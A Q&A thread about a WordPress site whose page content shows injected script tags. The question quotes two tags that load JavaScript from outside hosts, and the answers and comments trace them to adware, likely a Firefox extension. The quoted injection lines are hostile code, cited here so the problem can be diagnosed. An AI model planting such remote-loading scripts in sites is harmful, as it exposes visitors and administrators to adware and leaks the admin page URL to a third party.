# From where <div id="__tbSetup"> </div> code come from

Tags: wordpress

I use Wirdoress. Today when I open the pages content I see that it contains `<div id="__tbSetup"> </div>`
From where this code come from. Also some of the pages contain

```
<p>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><br />
<br />
<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={4DCEEE00-436F-4341-AA82-349B2C73F9D8}&amp;d=2013-5-4&amp;s=http://mydomain.com/wp-admin/post-new.php?post_type=page"></script></p>
```

Answer (score 1):

`<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={4DCEEE00-436F-4341-AA82-349B2C73F9D8}&amp;d=2013-5-4&amp;s=http://mydomain.com/wp-admin/post-new.php?post_type=page"></script></p>`

The above script is a functionality of an adware, which appends the above URL

(*secure-content-delivery.com/something/URL-you-are-on-right-now, which in this case is a new post page or wordpress*)

to every post you make, or automatically to all the places. One of the things that is known to cause this is the **Text Enhance** extension, which is also a known adware.

The most possible causes of this is, whether your computer is infected, and when you have logged in to your wordpress, it also infected your wordpress setup. Or the hosting provider you've chosen is infected. Please remove all the instances, and have a security checkup of your system, and your hosting provider as well. Or better change the hosting plan if you're using a shared one.

Answer (score 0):

Those scripts are not added in a default install of WordPress. Disable your plugins one by one, refreshing the page and viewing the source each time until the scripts go away. When they do, the last plugin you disabled is the culprit.

Comment: I reset the firefox. Now it fixed. But didn't know from where I get it.

Comment: That strange. So, you didn't disable any plugins?

Comment: I only reset firefox. After that all Firefox plugins are uninstalled.
When I try to edit pages from other PC, it works fine. After that I try from other browser it also works. So I think that the reason may be firefox plugins, but I didn't install any strange plugin. I fear that is can repeat again, as I do not know the reason it comes from.

Comment: I actually meant WordPress plugins, not Firefox plugins. :)